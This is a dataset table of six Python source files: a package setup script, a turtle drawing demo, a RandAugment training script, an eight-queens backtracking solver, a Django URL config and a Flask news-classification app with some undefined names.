blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
dae4ecb5884d1cc97297a64c1834d03c9fdee1c8 | da3bfb9783d1341b7766b9e472de3b2c710ff99b | /setup.py | 6abed9f661bf9afd1eade9247f816e74a9d68a88 | [
"MIT"
] | permissive | ml-ai-nlp-ir/Utter-More | 7d74fb5206ef01e72a46218bd33218eb806aff10 | 98bed9468547cb4f2eb9df1209a9020e4be5d0a5 | refs/heads/master | 2020-03-25T11:54:48.411260 | 2018-07-31T10:05:42 | 2018-07-31T10:05:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 895 | py | from setuptools import setup, find_packages
# setup.py for the Utter-More package.
# NOTE(review): `setup` and `find_packages` come from the setuptools import on
# the (truncated) preceding line of the file.
import re

# The README doubles as the PyPI long description.
with open('README.md', 'r') as f:
    long_description = f.read()

# Read __version__ / __name__ out of the package's __init__.py so the values
# live in exactly one place (expects lines like: __version__ = '1.2.3').
with open('utter_more/__init__.py', 'r') as f:
    setup_file = f.read()
version = re.findall(r'__version__ = \'(.*)\'', setup_file)[0]
name = re.findall(r'__name__ = \'(.*)\'', setup_file)[0]

setup(
    name=name,
    version=version,
    author='Jacob Scott',
    author_email='jscott12009@gmail.com',
    description='Creates utterances for Amazon\'s Alexa.',
    license='MIT',
    url='https://github.com/crumpstrr33/Utter-More',
    packages=find_packages(exclude=['test*']),
    python_requires='>=3',
    long_description=long_description,
    long_description_content_type='text/markdown',
    classifiers=[
        'Intended Audience :: Developers',
        'License :: OSI Approved :: MIT License',
        'Programming Language :: Python :: 3 :: Only'
    ]
)
| [
"jscott12009@gmail.com"
] | jscott12009@gmail.com |
5fdc3c4390e08eb72b6130d9e29542a87bf81fe3 | 00062339eecba8d0d7eac283816c29c57417ee14 | /sqaure.py | 8e6c1c8341a39b1c1e0e1fd177b4c7c9e3f09aea | [] | no_license | tomtch/python_pixel_art | cce2ba22a78842e31b1b6c6119f80d13e43edcb2 | ea8599ef68a15a80a921e0980852bc780bcf5e64 | refs/heads/main | 2023-07-13T16:17:40.813523 | 2021-09-10T11:11:27 | 2021-09-10T11:11:27 | 405,012,117 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 380 | py | import turtle
from datetime import datetime  # NOTE(review): unused import
from tkinter import Image      # NOTE(review): unused import

# `turtle` is imported on the (truncated) preceding line of the file.
t = turtle.Turtle()
t.color("#3C9118", "cyan")  # pen colour green, fill colour cyan

# First filled square: three (forward, left) sides in the loop, then the
# closing fourth side.  Indentation reconstructed - the original dump lost
# all leading whitespace; loop membership of the trailing forward is the
# only reading that draws a closed square - TODO confirm against the repo.
t.begin_fill()
for x in range(1,4):
    t.forward(100)
    t.left(90)
t.forward(100)
t.end_fill()

# Move to the second square's position without drawing.
t.penup()
t.forward(150)
t.left(90)
t.pendown()

# Second filled square, same pattern.
t.begin_fill()
for x in range(1,4):
    t.forward(100)
    t.left(90)
t.forward(100)
t.end_fill()

turtle.done()
| [
"tomtch18@gmail.com"
] | tomtch18@gmail.com |
d3fd4d5f5e723479c84cb518ed1e8f3a9e5420fc | 2d45ffc02f9ff348f6a995e72dd3d839dbca94c5 | /RandAugment/train.py | c854b9ab75c67a93d32584cdfde24c81b69a3aca | [
"MIT"
] | permissive | yuanxing-syy/pytorch-randaugment | 5c8fb9edb2657207879b398d7288f9c6eb9b7355 | dab97f8c1f45e291e4b89e0776c00fce49d95a18 | refs/heads/master | 2020-09-28T21:30:06.145147 | 2019-12-06T07:38:38 | 2019-12-06T07:38:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,932 | py | import itertools
import json
import logging
import math
import os
from collections import OrderedDict
import torch
from torch import nn, optim
from torch.nn.parallel.data_parallel import DataParallel
from tqdm import tqdm
from theconf import Config as C, ConfigArgumentParser
from RandAugment.common import get_logger
from RandAugment.data import get_dataloaders
from RandAugment.lr_scheduler import adjust_learning_rate_resnet
from RandAugment.metrics import accuracy, Accumulator
from RandAugment.networks import get_model, num_class
from warmup_scheduler import GradualWarmupScheduler
from RandAugment.common import add_filehandler
logger = get_logger('RandAugment')
logger.setLevel(logging.INFO)
def run_epoch(model, loader, loss_fn, optimizer, desc_default='', epoch=0, writer=None, verbose=1, scheduler=None):
    """Run one pass over `loader`.

    When `optimizer` is given the pass trains (backward + clip + step);
    when it is None the pass only evaluates.  Returns an Accumulator of
    per-sample-averaged metrics: loss/top1/top5, plus 'lr' when training.

    NOTE(review): when verbose is truthy, `writer` is dereferenced at the
    end - callers must pass a writer in that case (default None would crash).
    """
    tqdm_disable = bool(os.environ.get('TASK_NAME', ''))  # KakaoBrain Environment
    if verbose:
        loader = tqdm(loader, disable=tqdm_disable)
        loader.set_description('[%s %04d/%04d]' % (desc_default, epoch, C.get()['epoch']))

    metrics = Accumulator()
    cnt = 0                      # total samples seen (weights the averages)
    total_steps = len(loader)
    steps = 0
    for data, label in loader:
        steps += 1
        data, label = data.cuda(), label.cuda()

        if optimizer:
            optimizer.zero_grad()
        preds = model(data)
        loss = loss_fn(preds, label)

        if optimizer:
            loss.backward()
            # Gradient clipping; config key 'clip' defaults to 5, <=0 disables.
            if C.get()['optimizer'].get('clip', 5) > 0:
                nn.utils.clip_grad_norm_(model.parameters(), C.get()['optimizer'].get('clip', 5))
            optimizer.step()

        top1, top5 = accuracy(preds, label, (1, 5))
        # Accumulate sums weighted by batch size so the final /cnt is a
        # true per-sample mean even with a ragged last batch.
        metrics.add_dict({
            'loss': loss.item() * len(data),
            'top1': top1.item() * len(data),
            'top5': top5.item() * len(data),
        })
        cnt += len(data)
        if verbose:
            postfix = metrics / cnt
            if optimizer:
                postfix['lr'] = optimizer.param_groups[0]['lr']
            loader.set_postfix(postfix)

        # Fractional-epoch scheduler step (epoch is 1-based here).
        if scheduler is not None:
            scheduler.step(epoch - 1 + float(steps) / total_steps)

        del preds, loss, top1, top5, data, label

    if tqdm_disable:
        # No progress bar in this environment - log a one-line summary instead.
        if optimizer:
            logger.info('[%s %03d/%03d] %s lr=%.6f', desc_default, epoch, C.get()['epoch'], metrics / cnt, optimizer.param_groups[0]['lr'])
        else:
            logger.info('[%s %03d/%03d] %s', desc_default, epoch, C.get()['epoch'], metrics / cnt)

    metrics /= cnt
    if optimizer:
        metrics.metrics['lr'] = optimizer.param_groups[0]['lr']
    if verbose:
        for key, value in metrics.items():
            writer.add_scalar(key, value, epoch)
    return metrics
def train_and_eval(tag, dataroot, test_ratio=0.0, cv_fold=0, reporter=None, metric='last', save_path=None, only_eval=False):
    """Full train/eval pipeline driven by the theconf config singleton C.

    :param tag: tensorboard run name ('' disables tensorboard logging)
    :param dataroot: dataset root directory
    :param test_ratio: train/valid split ratio (0 -> no valid split)
    :param cv_fold: cross-validation fold index for the split
    :param reporter: optional callback receiving valid/test loss & top1
    :param metric: 'last' keeps the latest eval; otherwise keep the best
                   epoch according to rs[metric]['top1']
    :param save_path: checkpoint path (.pth); also used to resume
    :param only_eval: skip training and just evaluate the checkpoint
    :return: OrderedDict of loss/top1/top5 per split plus 'epoch'
    """
    if not reporter:
        reporter = lambda **kwargs: 0

    max_epoch = C.get()['epoch']
    trainsampler, trainloader, validloader, testloader_ = get_dataloaders(C.get()['dataset'], C.get()['batch'], dataroot, test_ratio, split_idx=cv_fold)

    # create a model & an optimizer
    model = get_model(C.get()['model'], num_class(C.get()['dataset']))

    criterion = nn.CrossEntropyLoss()
    if C.get()['optimizer']['type'] == 'sgd':
        optimizer = optim.SGD(
            model.parameters(),
            lr=C.get()['lr'],
            momentum=C.get()['optimizer'].get('momentum', 0.9),
            weight_decay=C.get()['optimizer']['decay'],
            nesterov=C.get()['optimizer']['nesterov']
        )
    else:
        raise ValueError('invalid optimizer type=%s' % C.get()['optimizer']['type'])

    lr_scheduler_type = C.get()['lr_schedule'].get('type', 'cosine')
    if lr_scheduler_type == 'cosine':
        scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=C.get()['epoch'], eta_min=0.)
    elif lr_scheduler_type == 'resnet':
        scheduler = adjust_learning_rate_resnet(optimizer)
    else:
        raise ValueError('invalid lr_schduler=%s' % lr_scheduler_type)

    # Optional linear warmup wrapping the base scheduler.
    if C.get()['lr_schedule'].get('warmup', None):
        scheduler = GradualWarmupScheduler(
            optimizer,
            multiplier=C.get()['lr_schedule']['warmup']['multiplier'],
            total_epoch=C.get()['lr_schedule']['warmup']['epoch'],
            after_scheduler=scheduler
        )

    # Without a tag, a dummy writer keeps the call sites uniform.
    if not tag:
        from RandAugment.metrics import SummaryWriterDummy as SummaryWriter
        logger.warning('tag not provided, no tensorboard log.')
    else:
        from tensorboardX import SummaryWriter
    writers = [SummaryWriter(log_dir='./logs/%s/%s' % (tag, x)) for x in ['train', 'valid', 'test']]

    result = OrderedDict()
    epoch_start = 1
    if save_path and os.path.exists(save_path):
        # Resume: accept either a full checkpoint dict or a bare state_dict.
        logger.info('%s file found. loading...' % save_path)
        data = torch.load(save_path)
        if 'model' in data or 'state_dict' in data:
            key = 'model' if 'model' in data else 'state_dict'
            logger.info('checkpoint epoch@%d' % data['epoch'])
            # Normalise 'module.' prefixes between DataParallel and plain models.
            if not isinstance(model, DataParallel):
                model.load_state_dict({k.replace('module.', ''): v for k, v in data[key].items()})
            else:
                model.load_state_dict({k if 'module.' in k else 'module.'+k: v for k, v in data[key].items()})
            optimizer.load_state_dict(data['optimizer'])
            if data['epoch'] < C.get()['epoch']:
                epoch_start = data['epoch']
            else:
                # Checkpoint already trained to completion - evaluate only.
                only_eval = True
        else:
            model.load_state_dict({k: v for k, v in data.items()})
        del data
    else:
        logger.info('"%s" file not found. skip to pretrain weights...' % save_path)
        if only_eval:
            logger.warning('model checkpoint not found. only-evaluation mode is off.')
        only_eval = False

    if only_eval:
        logger.info('evaluation only+')
        model.eval()
        rs = dict()
        rs['train'] = run_epoch(model, trainloader, criterion, None, desc_default='train', epoch=0, writer=writers[0])
        rs['valid'] = run_epoch(model, validloader, criterion, None, desc_default='valid', epoch=0, writer=writers[1])
        rs['test'] = run_epoch(model, testloader_, criterion, None, desc_default='*test', epoch=0, writer=writers[2])
        for key, setname in itertools.product(['loss', 'top1', 'top5'], ['train', 'valid', 'test']):
            if setname not in rs:
                continue
            result['%s_%s' % (key, setname)] = rs[setname][key]
        result['epoch'] = 0
        return result

    # train loop
    best_top1 = 0
    for epoch in range(epoch_start, max_epoch + 1):
        model.train()
        rs = dict()
        rs['train'] = run_epoch(model, trainloader, criterion, optimizer, desc_default='train', epoch=epoch, writer=writers[0], verbose=True, scheduler=scheduler)
        model.eval()

        if math.isnan(rs['train']['loss']):
            raise Exception('train loss is NaN.')

        # Evaluate every 5 epochs and on the final epoch.
        if epoch % 5 == 0 or epoch == max_epoch:
            rs['valid'] = run_epoch(model, validloader, criterion, None, desc_default='valid', epoch=epoch, writer=writers[1], verbose=True)
            rs['test'] = run_epoch(model, testloader_, criterion, None, desc_default='*test', epoch=epoch, writer=writers[2], verbose=True)

            if metric == 'last' or rs[metric]['top1'] > best_top1:
                if metric != 'last':
                    best_top1 = rs[metric]['top1']
                for key, setname in itertools.product(['loss', 'top1', 'top5'], ['train', 'valid', 'test']):
                    result['%s_%s' % (key, setname)] = rs[setname][key]
                result['epoch'] = epoch

                writers[1].add_scalar('valid_top1/best', rs['valid']['top1'], epoch)
                writers[2].add_scalar('test_top1/best', rs['test']['top1'], epoch)

                reporter(
                    loss_valid=rs['valid']['loss'], top1_valid=rs['valid']['top1'],
                    loss_test=rs['test']['loss'], top1_test=rs['test']['top1']
                )

                # save checkpoint (latest, plus an epoch-stamped copy)
                if save_path:
                    logger.info('save model@%d to %s' % (epoch, save_path))
                    torch.save({
                        'epoch': epoch,
                        'log': {
                            'train': rs['train'].get_dict(),
                            'valid': rs['valid'].get_dict(),
                            'test': rs['test'].get_dict(),
                        },
                        'optimizer': optimizer.state_dict(),
                        'model': model.state_dict()
                    }, save_path)
                    torch.save({
                        'epoch': epoch,
                        'log': {
                            'train': rs['train'].get_dict(),
                            'valid': rs['valid'].get_dict(),
                            'test': rs['test'].get_dict(),
                        },
                        'optimizer': optimizer.state_dict(),
                        'model': model.state_dict()
                    }, save_path.replace('.pth', '_e%d_top1_%.3f_%.3f' % (epoch, rs['train']['top1'], rs['test']['top1']) + '.pth'))

    del model
    result['top1_test'] = best_top1
    return result
if __name__ == '__main__':
    # CLI entry point; theconf's parser merges -c/--config options with these.
    parser = ConfigArgumentParser(conflict_handler='resolve')
    parser.add_argument('--tag', type=str, default='')
    parser.add_argument('--dataroot', type=str, default='/data/private/pretrainedmodels', help='torchvision data folder')
    parser.add_argument('--save', type=str, default='')
    parser.add_argument('--cv-ratio', type=float, default=0.0)
    parser.add_argument('--cv', type=int, default=0)
    parser.add_argument('--only-eval', action='store_true')
    args = parser.parse_args()

    # --only-eval requires a checkpoint to evaluate.
    assert (args.only_eval and args.save) or not args.only_eval, 'checkpoint path not provided in evaluation mode.'

    if not args.only_eval:
        if args.save:
            logger.info('checkpoint will be saved at %s' % args.save)
        else:
            logger.warning('Provide --save argument to save the checkpoint. Without it, training result will not be saved!')
    if args.save:
        # Mirror the log next to the checkpoint file.
        add_filehandler(logger, args.save.replace('.pth', '.log'))

    logger.info(json.dumps(C.get().conf, indent=4))

    import time
    t = time.time()
    result = train_and_eval(args.tag, args.dataroot, test_ratio=args.cv_ratio, cv_fold=args.cv, save_path=args.save, only_eval=args.only_eval, metric='test')
    elapsed = time.time() - t

    logger.info('done.')
    logger.info('model: %s' % C.get()['model'])
    logger.info('augmentation: %s' % C.get()['aug'])
    logger.info('\n' + json.dumps(result, indent=4))
    logger.info('elapsed time: %.3f Hours' % (elapsed / 3600.))
    logger.info('top1 error in testset: %.4f' % (1. - result['top1_test']))
    logger.info(args.save)
| [
"curtis.abcd@kakaobrain.com"
] | curtis.abcd@kakaobrain.com |
e7ef7fa6fef016bc2e8239b3f17ab4d671eb424a | 33a48e4a9a6781106fc33a1c13ad708484a69274 | /queen.py | 6fe92d474ba4859bb18065ad2d7059e9737f8145 | [] | no_license | Fazziekey/AI_project | 9569a780f06a528116d91f0ac0bc547a1d91a218 | 6a69d2ea914ec5dbc0107c064e21ffb7b976c1c9 | refs/heads/main | 2023-06-08T10:21:20.565925 | 2021-06-28T13:57:38 | 2021-06-28T13:57:38 | 349,648,844 | 10 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,997 | py | # Developer:Fazzie
# Time: 2021/3/2116:23
# File name: queen.py
# Development environment: Anaconda Python
import numpy as np # 提供维度数组与矩阵运算
import copy # 从copy模块导入深度拷贝方法
from board import Chessboard
'''
# 初始化8*8八皇后棋盘
chessboard = Chessboard()
# 在棋盘上的坐标点(4,4)落子
chessboard.setQueen(4,4)
# 方法一,逐子落子
# 选择False不打印中间过程棋盘
# 完成八皇后落子
# 终局胜负条件判定及输出
chessboard.boardInit(False)
chessboard.setQueen(0,0,False)
chessboard.setQueen(1,6,False)
chessboard.setQueen(2,4,False)
chessboard.setQueen(3,7,False)
chessboard.setQueen(4,1,False)
chessboard.setQueen(5,3,False)
chessboard.setQueen(6,5,False)
chessboard.setQueen(7,2,False)
chessboard.printChessboard(False)
print("Win? ---- ",chessboard.isWin())
# 方法二,序列落子
# 选择False不打印中间过程棋盘
# 完成八皇后落子
# 终局胜负条件判定及输出
chessboard.boardInit(False)
Queen_setRow = [0,6,4,7,1,3,5,2]
for i,item in enumerate(Queen_setRow):
chessboard.setQueen(i,item,False)
chessboard.printChessboard(False)
print("Win? ---- ",chessboard.isWin())
# 开放接口
# 让玩家自行体验八皇后游戏
chessboard = Chessboard()
chessboard.play()
'''
# 基于棋盘类,设计搜索策略
class Game:
    """Eight-queens solver built on the Chessboard helper.

    Each solution in ``self.solves`` is a list of 8 column indices, one per
    row, e.g. [0, 6, 4, 7, 1, 3, 5, 2] meaning queens at
    (0,0), (1,6), (2,4), (3,7), (4,1), (5,3), (6,5), (7,2).
    """

    def __init__(self, show=True):
        """Initialise the game state and reset the board."""
        self.chessBoard = Chessboard(show)
        self.solves = []  # all complete solutions found by run()
        self.solve = []   # columns of the partial placement (index == row)
        self.gameInit()

    def gameInit(self, show=True):
        """Reset the chessboard.

        ``show`` is accepted but unused; kept for interface compatibility.
        """
        self.Queen_setRow = [-1] * 8
        self.chessBoard.boardInit(False)

    def run(self, row=0):
        """Depth-first backtracking search.

        Tries every non-attacked column for ``row``, recurses into the next
        row, and snapshots each complete placement into ``self.solves``.
        """
        if row == 8:
            # All 8 queens placed - record a copy of the current placement.
            self.solves.append(list(self.solve))
            # Fix: the original fell through here and scanned all columns
            # again (every isvalid() call necessarily failed, so it was
            # wasted work rather than a wrong answer).
            return
        for column in range(8):
            if self.isvalid(column):
                self.solve.append(column)
                self.run(row + 1)
                self.solve.pop()  # backtrack

    def isvalid(self, column):
        """Return True if a queen at (len(self.solve), column) attacks no
        previously placed queen (same column or same diagonal)."""
        row = len(self.solve)
        for i, placed in enumerate(self.solve):
            if placed == column or (row - i) == abs(column - placed):
                return False
        return True

    def showResults(self, result):
        """Render one solution on the chessboard."""
        self.chessBoard.boardInit(False)
        for i, item in enumerate(result):
            if item >= 0:
                self.chessBoard.setQueen(i, item, False)
        self.chessBoard.printChessboard(False)

    def get_results(self):
        """Run the search and return the list of solutions
        (signature required by the grader - do not modify).

        Fix: dropped the debug ``print("---/n", ...)`` (note the "/n" typo)
        that dumped all 92 solutions to stdout on every call.
        """
        self.run()
        return self.solves
# Driver: solve, report the solution count, and display the first solution.
game = Game()
solutions = game.get_results()
print('There are {} results.'.format(len(solutions)))
#print(len(solutions[0]))
# print(solutions)
game.showResults(solutions[0])
| [
"1240419984@qq.com"
] | 1240419984@qq.com |
8143bc8f5472437617a95328464fcab857018571 | b8e79ccbcb68b7dd0342f4b64af99cad5cba2b1e | /Face_recognition_opencv_django/urls.py | 34a3a9594d9f549f12e6029d37b1250cabca6563 | [] | no_license | scekic/Face_Recognition_OpenCV_Django | 83e67e9d5abe3d4af986552de3715891324d0ace | 5c73c8303a9cd3fe18f680bb92de6e5e20e11e4a | refs/heads/master | 2022-09-17T12:33:28.442653 | 2020-06-04T11:16:27 | 2020-06-04T11:16:27 | 269,309,022 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,076 | py | """Face_recognition_opencv_django URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
from Face_recognition_opencv_django import views as app_views
# Route table: each pattern maps to a view in Face_recognition_opencv_django.views,
# plus the Django admin and the included face_recognition app URLs.
urlpatterns = [
    url(r'^$', app_views.index),
    url(r'^create_dataset$', app_views.create_dataset),
    url(r'^trainer$', app_views.trainer),
    url(r'^detect$', app_views.detect),
    url(r'^admin/', admin.site.urls),
    url(r'^records/', include('face_recognition.urls')),
]
| [
"scekic.luka@gmail.com"
] | scekic.luka@gmail.com |
23033e06f849b85dadc20b94437ee03c24802976 | c7f43c4cc0ee84a5fe246b67f51e30b8d726ebd5 | /keras/keras09_mlp.py | 44099b84aa0e9f80008f67c742b96110ca820afa | [] | no_license | 89Mansions/AI_STUDY | d9f8bdf206f14ba41845a082e731ea844d3d9007 | d87c93355c949c462f96e85e8d0e186b0ce49c76 | refs/heads/master | 2023-07-21T19:11:23.539693 | 2021-08-30T08:18:59 | 2021-08-30T08:18:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 338 | py | import numpy as np
# (numpy is imported as np on the truncated preceding line)
# Comments translated from Korean.
# x = np.array([1,2,3,4,5,6,7,8,9,10]) # vector x of 10 scalars
x = np.array([[1,2,3,4,5,6,7,8,9,10],
              [1,2,3,4,5,6,7,8,9,10]])  # a matrix of two 10-scalar vectors
y = np.array([1,2,3,4,5,6,7,8,9,10])
print(x.shape)  # (10,) would mean 10 scalars ----> here it is (2, 10)
"hwangkei0212@gmail.com"
] | hwangkei0212@gmail.com |
5d179adcafd7f73af265964dd7da77cb55ba8b2e | ce03bb849969449a7df149c5cfc46d9fbf7b267e | /app.py | 6d12b8c861a513334daddcea28380fd5fdc5502a | [] | no_license | MineYaman/OtomatikSesTranskripsiyonu | 31ec8dece5f55a887be60b28a03b2a3ee28c0994 | 927dfad4ed7ab89cdc0c6c24f13d8aeebdc05c6a | refs/heads/master | 2022-12-04T08:54:37.241191 | 2020-09-02T15:51:21 | 2020-09-02T15:51:21 | 292,323,053 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,630 | py | from flask import Flask,render_template,url_for,request
import pandas as pd
import pickle
import re
from sklearn.feature_extraction.text import CountVectorizer
import nltk
from nltk.corpus import stopwords
from nltk.tokenize import punkt
from nltk.corpus.reader import wordnet
from nltk.stem import WordNetLemmatizer
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.model_selection import train_test_split
from sklearn.feature_selection import chi2
import numpy as np
app = Flask(__name__)
@app.route('/')
def home():
    """Render the landing page template."""
    return render_template('home.html')
@app.route('/predict',methods=['POST'])
def predict(features):
    """Rebuild the BBC-news text-classification pipeline, then render a
    category prediction for the submitted form message.

    NOTE(review) - visible problems, documented rather than fixed here:
      * Flask passes no positional arguments for this route, so the
        ``features`` parameter makes every request fail with a TypeError.
      * ``svc_model``, ``get_category_name`` and ``prediction_svc`` are not
        defined anywhere in this file - NameError risk at the lines below.
      * The entire dataset pipeline (cleaning, lemmatisation, TF-IDF,
        pickling of artefacts) re-runs on every single request.
      * The dump this file came from collapsed whitespace inside string
        literals (e.g. the multi-space replace below), so some literals may
        differ from the author's original - verify against the repo.
    """
    path_df = r"C:\Users\Feyza\Desktop\denemetez\latest-dneme\Dataset Creation\News_dataset.pickle"
    with open(path_df, 'rb') as data:
        df = pickle.load(data)
    df.head()            # NOTE(review): no-op expression statements
    df.loc[1]['Content']

    # Basic cleanup: strip carriage returns, newlines and runs of spaces.
    df['Content_Parsed_1'] = df['Content'].str.replace("\r", " ")
    df['Content_Parsed_1'] = df['Content_Parsed_1'].str.replace("\n", " ")
    df['Content_Parsed_1'] = df['Content_Parsed_1'].str.replace(" ", " ")

    text = "Mr Greenspan\'s"  # NOTE(review): leftover scratch variable
    text

    # " when quoting text
    df['Content_Parsed_1'] = df['Content_Parsed_1'].str.replace('"', '')

    # Lowercasing the text
    df['Content_Parsed_2'] = df['Content_Parsed_1'].str.lower()

    # Strip punctuation signs one at a time.
    punctuation_signs = list("...?:!.,;")
    df['Content_Parsed_3'] = df['Content_Parsed_2']
    for punct_sign in punctuation_signs:
        df['Content_Parsed_3'] = df['Content_Parsed_3'].str.replace(punct_sign, '')

    # Drop possessive 's.
    df['Content_Parsed_4'] = df['Content_Parsed_3'].str.replace("'s", "")

    # Downloading punkt and wordnet from NLTK (network call on every request)
    nltk.download('punkt')
    print("------------------------------------------------------------")
    nltk.download('wordnet')

    # Saving the lemmatizer into an object
    wordnet_lemmatizer = WordNetLemmatizer()

    # Lemmatise every article, verb-mode.
    nrows = len(df)
    lemmatized_text_list = []
    for row in range(0, nrows):
        # Create an empty list containing lemmatized words
        lemmatized_list = []
        # Save the text and its words into an object
        text = df.loc[row]['Content_Parsed_4']
        text_words = text.split(" ")
        # Iterate through every word to lemmatize
        for word in text_words:
            lemmatized_list.append(wordnet_lemmatizer.lemmatize(word, pos="v"))
        # Join the list
        lemmatized_text = " ".join(lemmatized_list)
        # Append to the list containing the texts
        lemmatized_text_list.append(lemmatized_text)

    df['Content_Parsed_5'] = lemmatized_text_list

    # Downloading the stop words list
    nltk.download('stopwords')
    # Loading the stop words in english
    stop_words = list(stopwords.words('english'))
    stop_words[0:10]

    # Word-boundary regex demo (scratch code, result unused).
    example = "me eating a meal"
    word = "me"
    # The regular expression is:
    regex = r"\b" + word + r"\b"  # we need to build it like that to work properly
    re.sub(regex, "StopWord", example)

    # Remove every stop word via word-boundary regex replacement.
    df['Content_Parsed_6'] = df['Content_Parsed_5']
    for stop_word in stop_words:
        regex_stopword = r"\b" + stop_word + r"\b"
        df['Content_Parsed_6'] = df['Content_Parsed_6'].str.replace(regex_stopword, '')

    # NOTE(review): the following seven lookups are no-op inspections.
    df.loc[5]['Content']
    df.loc[5]['Content_Parsed_1']
    df.loc[5]['Content_Parsed_2']
    df.loc[5]['Content_Parsed_3']
    df.loc[5]['Content_Parsed_4']
    df.loc[5]['Content_Parsed_5']
    df.loc[5]['Content_Parsed_6']
    df.head(1)

    # Keep only the final parsed column (renamed) plus identifiers.
    list_columns = ["File_Name", "Category", "Complete_Filename", "Content", "Content_Parsed_6"]
    df = df[list_columns]
    df = df.rename(columns={'Content_Parsed_6': 'Content_Parsed'})
    df.head()

    # Label encoding for the five BBC categories.
    category_codes = {
        'business': 0,
        'entertainment': 1,
        'politics': 2,
        'sport': 3,
        'tech': 4
    }

    # Category mapping
    df['Category_Code'] = df['Category']
    df = df.replace({'Category_Code':category_codes})
    df.head()

    X_train, X_test, y_train, y_test = train_test_split(df['Content_Parsed'],
                                                        df['Category_Code'],
                                                        test_size=0.15,
                                                        random_state=8)

    # Parameter election
    ngram_range = (1,2)
    min_df = 10
    max_df = 1.
    max_features = 300

    tfidf = TfidfVectorizer(encoding='utf-8',
                            ngram_range=ngram_range,
                            stop_words=None,
                            lowercase=False,
                            max_df=max_df,
                            min_df=min_df,
                            max_features=max_features,
                            norm='l2',
                            sublinear_tf=True)

    features_train = tfidf.fit_transform(X_train).toarray()
    labels_train = y_train
    print(features_train.shape)

    features_test = tfidf.transform(X_test).toarray()
    labels_test = y_test
    print(features_test.shape)

    # NOTE(review): redundant re-imports; both names already imported at module level.
    from sklearn.feature_selection import chi2
    import numpy as np

    # Per-category chi2 feature inspection (printed, not used downstream).
    for Product, category_id in sorted(category_codes.items()):
        features_chi2 = chi2(features_train, labels_train == category_id)
        indices = np.argsort(features_chi2[0])
        feature_names = np.array(tfidf.get_feature_names())[indices]
        unigrams = [v for v in feature_names if len(v.split(' ')) == 1]
        bigrams = [v for v in feature_names if len(v.split(' ')) == 2]
        print("# '{}' category:".format(Product))
        print(" . Most correlated unigrams:\n. {}".format('\n. '.join(unigrams[-5:])))
        print(" . Most correlated bigrams:\n. {}".format('\n. '.join(bigrams[-2:])))
        print("")
    bigrams  # NOTE(review): no-op (leaks the last loop iteration's value)

    # Persist every intermediate artefact to the working directory.
    # X_train
    with open('X_train.pickle', 'wb') as output:
        pickle.dump(X_train, output)
    # X_test
    with open('X_test.pickle', 'wb') as output:
        pickle.dump(X_test, output)
    # y_train
    with open('y_train.pickle', 'wb') as output:
        pickle.dump(y_train, output)
    # y_test
    with open('y_test.pickle', 'wb') as output:
        pickle.dump(y_test, output)
    # df
    with open('df.pickle', 'wb') as output:
        pickle.dump(df, output)
    # features_train
    with open('features_train.pickle', 'wb') as output:
        pickle.dump(features_train, output)
    # labels_train
    with open('labels_train.pickle', 'wb') as output:
        pickle.dump(labels_train, output)
    # features_test
    with open('features_test.pickle', 'wb') as output:
        pickle.dump(features_test, output)
    # labels_test
    with open('labels_test.pickle', 'wb') as output:
        pickle.dump(labels_test, output)
    # TF-IDF object
    with open('tfidf.pickle', 'wb') as output:
        pickle.dump(tfidf, output)

    # Obtain the highest probability of the predictions for each article
    # NOTE(review): svc_model and features are undefined here - NameError.
    predictions_proba = svc_model.predict_proba(features).max(axis=1)
    # Predict using the input model
    predictions_pre = svc_model.predict(features)

    # Replace prediction with 6 if associated cond. probability less than threshold
    predictions = []
    for prob, cat in zip(predictions_proba, predictions_pre):
        if prob > .65:
            predictions.append(cat)
        else:
            predictions.append(5)

    # Return result
    # NOTE(review): get_category_name is undefined in this file.
    categories = [get_category_name(x) for x in predictions]

    if request.method == 'POST':
        message = request.form['message']
        data = [message]
        # NOTE(review): prediction_svc is undefined; `data` is never used.
        my_prediction = get_category_name(prediction_svc)
    # NOTE(review): indentation reconstructed - if the original return was
    # inside the if-block, a non-POST request would fall through to None.
    return render_template('result.html',prediction = my_prediction)
if __name__ == '__main__':
app.run(debug=True) | [
"mnyaman04@gmail.com"
] | mnyaman04@gmail.com |
